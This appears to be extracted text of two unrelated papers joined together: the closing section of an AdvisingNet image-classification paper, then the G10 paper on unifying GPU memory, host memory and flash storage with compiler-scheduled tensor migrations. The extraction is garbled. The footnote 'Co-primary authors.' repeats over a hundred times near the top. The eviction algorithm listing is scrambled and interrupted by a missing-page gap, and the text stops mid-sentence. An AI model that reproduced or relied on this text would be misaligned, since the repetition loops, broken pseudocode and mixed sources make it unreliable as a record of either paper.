(Phan and Nguyen 2022; Taesiri, Nguyen, and Nguyen 2022). Rather than refining predictions by re-ranking nearest neighbors from kNN classifiers, we steer our attention towards optimizing the ranking of top-predicted classes resulting from a softmax classifier. Furthermore, while traditional kNN-based strategies and methods like ProtoPNet (Chen et al. 2019) require significant computational resources due to the need for pairwise distance calculations or examination of all classes, our proposed algorithm TCR alleviates this demand by focusing only on a few top-predicted classes, concentrating computational resources in the most promising regions of the classification space. Put simply, the ranking is based not on similarity scores but on the confidences of AdvisingNet for classes. ## 6 Conclusion We present AdvisingNet, a model that compares an input image against its nearest neighbors to effectively classify whether a pretrained model correctly classifies an input image. In general, we found that AdvisingNets significantly outperformed previous human, AI, and team baselines in the task of classifying correct and incorrect predictions. Additionally, while AdvisingNets were not explicitly trained for multi-class image classification tasks, we also observed that they consistently help achieve accuracy that either outperformed or was on par with, state-of-the-art methods on both the CUB-200 and Cars-196 datasets. The benefits of using AdvisingNets over traditional deep CNN classifiers indicate the benefits of leveraging external data, especially nearest neighbors, to help in fine-grained classification tasks. Future Work and Limitations.Our findings suggest that AdvisingNets are not limited to improving only ResNets, but extend to enhancing any classification models. In cases where it is not feasible to leverage convolutional features as image-representing patch tokens, we can patchify images and encode them in a similar fashion as Vision Transformers (ViT) (Dosovitskiy et al. 2020). Due to computational constraints, scaling AdvisingNets for large-scale classification datasets, such as ImageNet (Russakovsky et al. 2015), has not been explored in this work. We also anticipate a connection between the performance of AdvisingNets and that of the pretrained models, a relationship that has not been investigated yet. Figure 3: An example of how AdvisingNet corrects a previously incorrect prediction on CUB-200. A RN50 model makes predictions on the Query image (ground-truth label: **Green Jay**) and produces initial ranking (top row) but the top-1 predicted class (**Indigo Bunting**) is incorrect. The AdvisingNet compares the query image with the representative of each class (the first NN example in each class) to re-rank those classes based on its confidence scores. The refined class ranking is presented in the bottom row where the **Green Jay** class has been successfully recognized as top-1.
2310.09443
G10: Enabling An Efficient Unified GPU Memory and Storage Architecture with Smart Tensor Migrations
To break the GPU memory wall for scaling deep learning workloads, a variety of architecture and system techniques have been proposed recently. Their typical approaches include memory extension with flash memory and direct storage access. However, these techniques still suffer from suboptimal performance and introduce complexity to the GPU memory management, making them hard to meet the scalability requirement of deep learning workloads today. In this paper, we present a unified GPU memory and storage architecture named G10 driven by the fact that the tensor behaviors of deep learning workloads are highly predictable. G10 integrates the host memory, GPU memory, and flash memory into a unified memory space, to scale the GPU memory capacity while enabling transparent data migrations. Based on this unified GPU memory and storage architecture, G10 utilizes compiler techniques to characterize the tensor behaviors in deep learning workloads. Therefore, it can schedule data migrations in advance by considering the available bandwidth of flash memory and host memory. The cooperative mechanism between deep learning compilers and the unified memory architecture enables G10 to hide data transfer overheads in a transparent manner. We implement G10 based on an open-source GPU simulator. Our experiments demonstrate that G10 outperforms state-of-the-art GPU memory solutions by up to 1.75$\times$, without code modifications to deep learning workloads. With the smart data migration mechanism, G10 can reach 90.3\% of the performance of the ideal case assuming unlimited GPU memory.
Haoyang Zhang, Yirui Eric Zhou, Yuqi Xue, Yiqi Liu, Jian Huang
2023-10-13T23:32:28Z
http://arxiv.org/abs/2310.09443v1
# G10: Enabling An Efficient Unified GPU Memory and Storage Architecture with Smart Tensor Migrations ###### Abstract. To break the GPU memory wall for scaling deep learning workloads, a variety of architecture and system techniques have been proposed recently. Their typical approaches include memory extension with flash memory and direct storage access. However, these techniques still suffer from suboptimal performance and introduce complexity to the GPU memory management, making them hard to meet the scalability requirement of deep learning workloads today. In this paper, we present a unified GPU memory and storage architecture named G10 driven by the fact that the tensor behaviors of deep learning workloads are highly predictable. G10 integrates the host memory, GPU memory, and flash memory into a unified memory space, to scale the GPU memory capacity while enabling transparent data migrations. Based on this unified GPU memory and storage architecture, G10 utilizes compiler techniques to characterize the tensor behaviors in deep learning workloads. Therefore, it can schedule data migrations in advance by considering the available bandwidth of flash memory and host memory. The cooperative mechanism between deep learning compilers and the unified memory architecture enables G10 to hide data transfer overheads in a transparent manner. We implement G10 based on an open-source GPU simulator. Our experiments demonstrate that G10 outperforms state-of-the-art GPU memory solutions by up to 1.75\(\times\), without code modifications to deep learning workloads. With the smart data migration mechanism, G10 can reach 90.3% of the performance of the ideal case assuming unlimited GPU memory. 2020GPDirect Storage, Unified Virtual Memory, GPU Memory, Solid State Drives, Deep Learning Compiler + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + Footnote †: [cs:12]Co-primary authors. + + Footnote †: [cs:12]Co-primary authors. the data across the heterogeneous memories to explore the data locality (Han et al., 2017; Wang et al., 2018; Wang et al., 2019; Wang et al., 2019). This inevitably complicates the GPU memory management and hurts the development productivity. Ideally, we wish to transparently expand the GPU memory using low-cost flash memory, while achieving similar performance as that of the GPU with unlimited on-board DRAM. Our characterization study of diverse DNN models (see SS3) shows that this is feasible. We disclose that (1) only a small portion (less than 10%) of tensors are active in each DNN training iteration, and (2) a majority of inactive tensors remain inactive for a long period of time (see Figure 3). This offers sufficient opportunities for us to move tensor data across heterogeneous memory devices. Therefore, if we can intelligently move inactive tensors from the fast GPU memory to the slow memories (i.e., host memory and flash memory), we can not only improve the utilization of the precious GPU memory but also hide the data access overheads of the slow memories. To achieve the aforementioned goals, we have to overcome three major challenges. First, to enable intelligent tensor migrations, we need to capture the memory demand and lifetime of different tensors in a deep learning model. The tensor-level semantic knowledge will serve as the guidance for scheduling tensor migrations. Second, as different tensors have different properties (i.e., tensor size and lifetime in Figure 4), we need to carefully decide which tensor should be migrated, where it should be migrated to, and when it should be migrated. Third, the tensor migrations should be transparent to applications, and the migration should be executed in an automated manner without requiring manual effort from developers. In this paper, we present G10, a unified GPU memory and storage architecture that enables smart tensor migrations for scaling the GPU memory transparently using flash memory, while tolerating the performance overheads of slow flash accesses. G10 consists of three major components: (1) a tensor vitality analyzer for extracting the semantic knowledge of tensors in a deep learning model, (2) a tensor migration scheduler for planning the tensor migrations in advance, and (3) a unified memory system for simplifying the GPU memory management and enabling transparent tensor migrations. The tensor vitality analyzer works with deep learning frameworks like PyTorch to track all the tensors in a DNN model. It leverages the execution graph generated by the compiler to learn the size and lifetime of each tensor as well as its dependency on other tensors. Therefore, the analysis procedure is almost free at the compilation stage. Based on the extracted semantic knowledge of tensors, the tensor migration scheduler of G10 will plan the tensor migrations in advance before executing the model training process. To maximize the benefits of tensor migrations, G10 prefers to migrate large tensors that will be inactive for a long time to the flash memory. Therefore, the precious GPU memory can be best utilized for active tensors. G10 will migrate these inactive tensors as many as possible to fully utilize the available bandwidths of flash memory and host memory. For the inactive tensors whose inactive time is short, G10 will make the best effort to keep them in the GPU memory to avoid unnecessary tensor migrations. In order to tolerate the long access delay of flash memory and host memory, G10 also plans intelligent data prefetching in advance with its tensor migration scheduler. The detailed algorithms of the tensor migration scheduler will be discussed in SS4. To facilitate the tensor migration, G10 integrates the GPU memory, host memory, and flash memory as a unified memory space by extending the Unified Virtual Memory (UVM) (Chen et al., 2017) of GPUs. G10 extends the page table of UVM by storing flash page addresses in its leaf-level page table entries. The unified page table can point to an address in either host memory, GPU memory, or flash memory. As G10 plans tensor migrations, it only needs to specify the virtual addresses of tensors. The unified memory system will conduct the transparent address translation at runtime. This significantly simplifies the GPU memory management and the compiler optimizations. We implement G10 by extending an open-source GPU simulator UVMSmart (Chen et al., 2017). To evaluate G10, we run a variety of DNN models with different batch sizes. Compared to state-of-the-art solutions, G10 improves the end-to-end DNN training performance by up to 1.75\(\times\), while scaling the GPU memory with low-cost flash memory. With smart tensor migrations planned at the compilation stage, G10 delivers 90.3% of the performance of the ideal case assuming unlimited GPU memory. Our sensitivity analysis shows that G10 still has significant benefits, as we scale the GPU-SSD PCIe bandwidth. Overall, we make the following contributions: * We conduct a characterization study of the memory usage of diverse DNN training workloads, and show that the predictable tensor behaviors of DNN models provide sufficient opportunities for enabling smart tensor migrations. * We develop a unified GPU memory and storage architecture named G10, and show the feasibility of scaling GPU memory with flash memory, while achieving similar performance as the ideal case assuming unlimited GPU memory. * We propose a smart tensor migration mechanism that can intelligently plan tensor migrations across heterogeneous memories at the compilation stage, based on the extracted semantic knowledge of tensors. * We evaluate G10 against state-of-the-art GPU memory solutions and show its benefits for various DNN models. ## 2. Background and Motivation In this section, we first present modern GPU memory and storage architecture. After that, we discuss existing approaches to scaling GPU memory, and their limitations. ### GPU Memory and Storage Architecture We demonstrate the system architecture of modern GPU memory and storage in Figure 1. The GPU and storage devices like SSDs are Figure 1. Modern GPU memory/storage architecture. connected with the host machine through the Peripheral Component Interconnect Express (PCIe) (Bartos et al., 2016). While GPU has its on-board memory, the memory capacity is constrained by the DRAM scaling wall and the limited on-board space for memory packages (Krishnan et al., 2017). Therefore, their memory cannot host the entire working set of large-scale deep learning workloads. To address this problem, GPUs follow the same way of managing memory/storage devices in CPU-centric computing, and use the storage device as a swapping disk. If a page requested by the GPU is not in its memory, a page fault will happen. And the GPU will inform the host to handle the page fault, load the page from the storage device, and move it to the GPU memory, causing significant data movement overhead. ### Approaches to Scaling GPU Memory **Expand GPU memory with host memory.** Compared to the GPU memory, the host machine usually equips a larger memory with limited bandwidth, making it a natural option for expanding GPU memory. While developers can manually swap the data between the host and GPU, modern GPUs make this procedure transparent with unified virtual memory (UVM) (Shi et al., 2017; Wang et al., 2018). UVM enables a unified and coherent virtual memory space between the host and GPU, so application data can be allocated to the space and accessed by host and GPU with shared virtual addresses. With the cooperation of GPU hardware and runtime, UVM maintains data consistency transparently and enables on-demand data migrations between the host and GPU at page granularity. Upon accessing a UVM page absent in the GPU memory, a GPU page fault will be triggered to request a data migration from the host (Krishnan et al., 2017; Wang et al., 2018). When the GPU memory is fully occupied, the least recently used pages are excited from the GPU memory to the host memory. To improve the swapping efficiency, prior studies (Krishnan et al., 2017; Wang et al., 2018; Wang et al., 2018; Wang et al., 2018; Wang et al., 2018; Wang et al., 2018; Wang et al., 2018) developed optimization techniques for improved data locality. However, GPU memory still cannot scale purely relying on the host memory to meet the increasing demands of deep learning workloads, especially those large ones. **Expand GPU memory with flash memory.** An alternative approach is to expand GPU memory with SSDs, as shown in Figure 1. The rapidly shrinking process technology has allowed SSDs to boost their bandwidth and capacity by increasing the number of chips. However, the GPU has to communicate with the host CPU to access data on the SSD, which incurs significant performance overhead (Wang et al., 2018; Wang et al., 2018; Wang et al., 2018). Most recently, NVIDIA's GPUDirect Storage allows GPU to bypass the host CPU and directly access the SSD via the PCIe interface (Wang et al., 2018). AMD's DirectGMA (Krishnan et al., 2017) also enables a similar functionality. However, current approaches of using flash memory to expand GPU memory are still suffering from suboptimal performance, as they cannot efficiently hide the slow flash accesses. A recent study proposed to offload intermediate data of DNN models to the SSD (Krishnan et al., 2017), and overlap the GPU processing with flash data accesses. However, due to the lack of rich semantic knowledge of tensors, there is still much space for improvement. In this paper, we conduct a characterization study of the semantic knowledge of tensors, and demonstrate the unexplored opportunities in SS3. ## 3. GPU Memory Characterizations In this section, we first study the memory usage patterns of DNN training for representative real-world large models listed in Table 1. We analyze the DNN dataflow graph to extract useful DNN semantics and profile the execution of each CUDA kernel on an NVIDIA A100 GPU. For ease of discussion, we define that a tensor is _active_ at a certain time if it is used by the currently executing kernel, or _inactive_ otherwise. We summarize our findings as follows. **Small memory requirement of active tensors.** We first study the total memory demand of a single training iteration. Figure 2 shows the amount of GPU memory required by active tensors and the total memory required during a training iteration. For most DNN models, active tensors only account for less than 10% (1% on average) of the total memory requirement. While the memory capacity required by the entire DNN can greatly exceed GPU memory, each layer only accounts for a small portion. For example, the largest kernel in our studied models occupies 5.7GB of memory, much smaller than the 40GB available memory of A100. This gives abundant opportunities to leverage the unused memory for preparing the tensors required by the next kernel, enabling efficient overlapping of GPU compute and memory swapping. **Observation (O1):** During DNN training, only a small portion of tensors are active and required in GPU DRAM. Most tensors are inactive and can be swapped out. Figure 2. Memory consumption of all and active tensors (w.r.t. peak memory consumption in a single training iteration). CUDA kernel indexes are in execution order. Long unused time of inactive tensors.To understand the memory usage pattern of inactive tensors, we study how long a tensor remains inactive. We define an _inactive period_ as a time interval during which the tensor remains inactive until it is used by another kernel. Figure 3 shows the distribution of lengths of the inactive periods for all tensors. For CNN models (ResNet152 and Inceptionv3), more than 60% of the inactive periods last longer than \(10^{7}\upmu\)s. For Transformer models (BERT and ViT), about 50% of the inactive periods last longer than \(10^{5}\upmu\)s. This indicates that many tensors have inactive periods longer than the SSD latency (e.g., \(20\upmu\)s), which provides opportunities for us to swap out these tensors to external SSD devices with negligible performance penalties. The long unused time of inactive tensors is the result of the temporally sparse tensor access pattern during DNN training. In a typical DNN dataflow graph, one tensor only needs to be used twice, one in the forward pass and the other in the backward pass, unless the tensor is involved in a branch or join layer. Although the dataflow graphs of some DNN models may have a complex topology consisting of multiple branches, joins, and unrolled loops, the overall dataflow still tends to be linear, so each tensor is only used for a few times. **Observation (O2):** During DNN training, many tensors stay inactive for a long time period. They can be safely swapped out before being needed again by any kernel. **Diversity of inactive tensors.** Figure 4 shows that the inactive periods of tensors have diverse lengths (e.g., ranging from \(\sim\)10\(\upmu\)s to 100\(\upmu\)s in Inceptionv3-512). The inactive tensors also have vastly different sizes (e.g., from less than 10KB to more than 2.7GB in Inceptionv3-512), and their distribution is quite sparse. In fact, over 60% to 80% of inactive periods are able to hide the swapping latency, indicating that we have sufficient opportunities to swap tensors. When we decide to swap out a tensor, we can reduce the GPU memory consumption during the tensor's inactive period. The diversity of inactive tensors introduces challenges to the swapping algorithm design, as different swapping decisions can have different benefits and I/O costs. To maximize the efficiency of memory swapping, it is important to choose those tensors that can reduce the memory usage by the largest amount, for the longest time, and with the lowest I/O cost. **Observation (O3):** Different swapping decisions impact GPU memory consumption differently in both time and space, given the different sizes and inactive period lengths of tensors. To maximize memory efficiency, we should swap out the most beneficial tensors. **Complexity of scheduling tensor swapping.** In Figure 2, we observe that the memory consumption of a DNN program is not uniform throughout its entire execution. As we make tensor swapping decisions, the GPU memory consumption pattern also changes as tensors are swapped in or out at runtime. Moreover, each swap occupies bandwidth of GPU-Host and GPU-SSD communications. Consequently, the above complexities render a static policy ineffective for deciding which tensor should be evicted and what time this eviction should occur. **Observation (O4):** The GPU memory consumption changes throughout the DNN training process and is affected dynamically by tensor swapping decisions. Hence, a static tensor swapping policy is insufficient for finding a globally optimized swapping plan. ## 4. G10 Design ### System Overview We show the G10 architecture in Figure 5. It has three major components: (1) a tensor vitality analyzer that quantifies the tensor size and liveness as we compile a DNN model (SS4.2); (2) a tensor migration scheduler for planning the tensor migrations in advance (SS4.3 and SS4.4); and (3) a unified memory system for simplifying GPU memory management and enabling transparent tensor migrations (SS4.5 and SS4.6). Figure 4. The distribution of inactive periods of tensors having different sizes. Figure 3. Distribution of tensor inactive period lengths. Given a DNN model, G10's tensor vitality analyzer will work with DNN compilers to track all the tensors and their dependencies, and quantify their sizes and lifetime (i.e., semantic knowledge of tensors). With these knowledge, the tensor migration scheduler will plan the optimized execution schemes of tensors, with the goal of maximally overlapping the GPU computation and tensor migrations. Identifying a globally optimized tensor migration plan is a dynamic optimization problem, as each tensor migration decision will affect subsequent decisions, due to its impact on the GPU memory pressure, and GPU-SSD and GPU-Host bandwidth utilizations. Therefore, we used a dynamic algorithm to iteratively find the best tensor candidates for eviction and prefetching. After that, G10 adds the eviction and prefetch instructions into the compiled program. GPU will execute these instructions at runtime with the unified GPU memory and storage architecture. As the GPU memory, host memory, and SSD are combined into a unified space, the tensor migrations are fully transparent to developers and DNN workloads. We will describe each component of G10 as follows. ### Tensor Vitality Analysis **Identifying _global tensors_ and _intermediate tensors_.** We first categorize the tensors based on their lifetimes in a DNN training iteration (i.e., one round of forward and backward propagation). As shown in Figure 6, a _global tensor_ such as model weights (e.g., W1) is used across multiple training iterations. It will be allocated in the unified memory space at the beginning of the DNN program. An _intermediate tensor_, such as the activation and gradient (e.g., A1 and dA2), is used within one iteration. We define the tensor as _born_ the first time when it was used, and as _dead_ after the last time it was used. Intermediate tensors can be deallocated after their deaths to free up GPU memory. **Identifying _tensor inactive time periods_.** When an operator is being executed on GPU, both its input and output tensors are _active_, and should be present in GPU memory. Otherwise, a tensor is _inactive_, if it is not being used by the currently executing kernel and is not yet dead. We define an _inactive time period_ of a tensor as the period during which the tensor is inactive and not dead (i.e., it is not being used right now but will be used in the future). For a complex DNN program, a tensor may have multiple inactive time periods and can be swapped in and out multiple times (e.g., W1 and A0). Both global and intermediate tensors can be inactive, and the inactive time period of a global tensor may span across two consecutive training iterations. For example, W1 turns inactive during the backward pass of the current iteration, and it becomes active again in the forward pass of the next. The inactive time periods of all tensors indicate when a tensor is safe to be migrated out and when it must be migrated back. As DNN programs have predictable performance and dataflow patterns, G10 performs offline compile-time profiling, and uses the execution times of the GPU kernels to estimate the lengths of the inactive time periods. Using the tensor sizes, the storage bandwidth, and the GPU-Host bandwidth, G10 estimates the eviction and prefetch overheads of each tensor. G10 then leverages all the inactive time periods to generate a globally optimized execution plan. ### Smart Tensor Eviction To generate a globally optimized migration plan, the smart tensor eviction algorithm must address the following challenges. First, we must utilize the limited GPU on-board memory to store the most beneficial tensors. As tensors have different sizes and inactive period lengths, they contribute different degrees of GPU memory pressure. Thus, evicting some tensors (e.g., large tensors with long inactive periods) yields more benefits in reducing GPU memory pressure. Second, we must consider both SSD and host memory as potential migration destinations, as they provide different bandwidths, capacities, and different migration overheads. Ideally, we Figure 5. System architecture of G10. aim to exploit both the high migration bandwidth of host memory and the large capacity of SSD. Third, we should best utilize the available migration bandwidth, as DNN workloads are mostly bandwidth-sensitive. The algorithm should also choose the best timings for tensor migrations. To this end, we propose a smart eviction scheduling algorithm that iteratively finds the best eviction candidates (i.e., tensor inactive periods) in each training iteration at compile time. The algorithm tracks the GPU memory consumption and the migration bandwidth utilization to evaluate potential benefits of an eviction. We describe its key ideas as follows. ``` Input:\(gpu\_cap\) = the GPU on-board memory capacity \(tensors\) = the list of all intermediate tensors \(periods\) = the list of all tensor inactive periods Output: A list of G10 tensor migration instructions 1Function\(EoticScheduling(gpu\_cap,\_tensors,\_periods)\): for\(i\) = 0; \(i\) < periodsize; \(i\) + do 2if\(max(mem\_pressure)\) < \(gpu\_cap\)then 3 break 4 sort periods by critical_mem_pressure_reduction 5if\(periods[0]\_critical\_mem\_pressure\_reduction>0\)then 6\(t\_r\) \(\leftarrow\) periods[0].start_time 7\(t\_s\) \(\leftarrow\) periods[0].tensor_size / BW_SSD 8if(to_ssd_traffic is full during t_r to t_r + t_s)then 9ifhost memin't full during periods[0]then 10 schedule pre-eviction(periods[0].tensor, host) at \(t\_r\) periods.erase(0) 11 12 end if 13 update memory pressure and I/O traffic 14continue 15 schedule pre-eviction(periods[0].tensor, SSD) at \(t\_r\) 16 update memory pressure and I/O traffic 17 18 periods.erase(0) 19 20 end if 21 schedule pre-eviction(periods[0].tensor, SSD) at \(t\_r\) 22 update memory pressure and I/O traffic 23 24 [MISSING_PAGE_POST] and bandwidths. In G10, we always attempt to evict tensors to the SSD first, due to its large capacity. In contrast, host memory only offers a limited memory capacity, and thus naively evicting to host memory easily consumes up the capacity, and falls back to evicting to SSD eventually. However, in some cases, we still want to leverage the valuable host memory for our tensor migration. Compared to the SSD, the host DRAM offers much higher access bandwidth. Thus, we only evict a tensor to host memory, when the SSD traffic is under high pressure, as shown in line 7-17 in Algorithm 1. In this way, G10 exploits the large SSD capacity when its bandwidth is sufficient, and utilizes the high migration bandwidth of GPU-Host when the SSD bandwidth is saturated. **Smart Tensor Eviction Scheduling.** We describe the end-to-end procedure of G10's smart tensor eviction scheduling algorithm in Algorithm 1. To generate an optimized migration plan, it iteratively searches for the best eviction candidate, until the GPU memory pressure is below the capacity limit or there are no more beneficial eviction candidates. The algorithm tracks the three global states throughout the search process: (1) a set of inactive periods, (2) the estimated memory pressure versus time, and (3) the estimated bandwidth utilizations. In each iteration of the algorithm, it selects one eviction candidate, chooses where to evict this tensor as described above, and updates the three states accordingly. ### Smart Tensor Prefetching To maximize memory pressure suppression, the smart tensor eviction algorithm assumes the prefetch to be performed at the latest time that does not cause data idleness, which is defined as the _latest safe prefetch time_. However, to ensure that each prefetch completes exactly before the respective tensor turns active, the algorithm needs a perfect estimation on inactive period lengths and I/O traffic status. Thus, inaccurate estimation of inactive period length or I/O traffic status will incur stalls under this default prefetch policy. Our insight is that for most DNN programs, the GPU memory pressure is under the capacity limit after scheduling the evictions. As shown in Figure 8, the GPU memory pressure, presented as the black curve, is under the GPU capacity over time. The naive prefetch policy does not fully utilize the remaining GPU memory. Based on our insight, G10 applies a smart prefetching algorithm that prefetches evicted inactive tensors eagerly to further tolerate imperfect migration decisions. G10 sorts all the evicted tensor inactive periods in the order of their _latest safe prefetch time_. G10 then traverses all evicted tensor inactive periods in order and reschedules their prefetch beforehand if possible. Figure 8 shows an example. For one evicted inactive period \(i\) with the latest safe prefetch time \(t_{i}\), the algorithm searches backward from time \(t_{i}\) until reaching the earliest time \(t^{\prime}_{i}\), when GPU can hold the entire tensor safely with the available space. In other words, the algorithm selects a time \(t^{\prime}_{i}\) at which placing this tensor on GPU will not exceed GPU memory capacity. Therefore, the algorithm schedules the prefetch for this tensor at \(t^{\prime}_{i}\), and the GPU memory pressure curve between time \(t^{\prime}_{i}\) and \(t_{i}\) is updated. If there is not such an optimization opportunity, the prefetch instruction will still be scheduled at time \(t_{i}\). **Code Instrumentation.** To enable smart data migration, G10 utilizes deep learning comilers to automatically insert the following instructions into the generated GPU program: (1) g10_prefetch(vaddr, size), which fetches a tensor into GPU memory; (2) g10_pre_evict(vaddr, size, target_loc), which evicts a tensor from GPU memory to the SSD or host memory; (3) g10_alloc(**xptr, size), which allocates a buffer on the GPU memory asynchronously; (4) g10_free(**xptr**), which frees the buffer asynchronously. We show an example of instrumented GPU program in Figure 9. We will further discuss these instructions in SS4.6. ### Unified GPU Memory and Storage The diversified memory and storage hierarchy (i.e., GPU memory, host memory, and SSD) inevitably increases the complexity of GPU memory management, and makes it challenging for G10 to track the memory locations for each tensor. To address this challenge, we develop a unified memory space. Therefore, G10 can plan the tensor migration schemes using virtual addresses, the runtime system will rely on the unified virtual memory to conduct the address translation, and identify the physical locations of tensors transparently. Prior studies (Han et al., 2017; Wang et al., 2018) proposed the unified address translation for memory-mapped SSDs, which combines the address mapping of SSDs into the page table of the virtual memory. Therefore, the page table entries can directly point to the physical flash addresses. Although GPU provides the unified virtual memory (UVM) to manage the host memory and GPU memory in a unified space (Han et al., 2017; Wang et al., 2018; Wang et al., 2018; Wang et al., 2018), current GPU UVM does not support flash memory. G10 integrates the GPU memory, host memory, and flash memory into a unified memory space for enabling transparent tensor migrations. With unified memory, all tensors are managed at the Figure 8. An example of scheduling prefetch time for one evicted inactive tensor. Figure 9. An example of instrumented GPU program. regular 4KB page granularity. For the tensors whose size is less than 4KB, G10 will compact them in a page to minimize the memory fragmentation across different memory types. As the GPU and host interact with the SSD at the regular page granularity, the I/O amplification of the SSD will not be worse than commodity SSDs. With the UVM extension, G10 has a unified address translation layer in the memory manager, where the flash address mappings in the flash translation layer have been integrated into the page table of the GPU UVM. In this case, the page table entry (PTE) will either point to an address in host memory or GPU memory or flash memory. G10 allows the SSD controller to update the page table entries 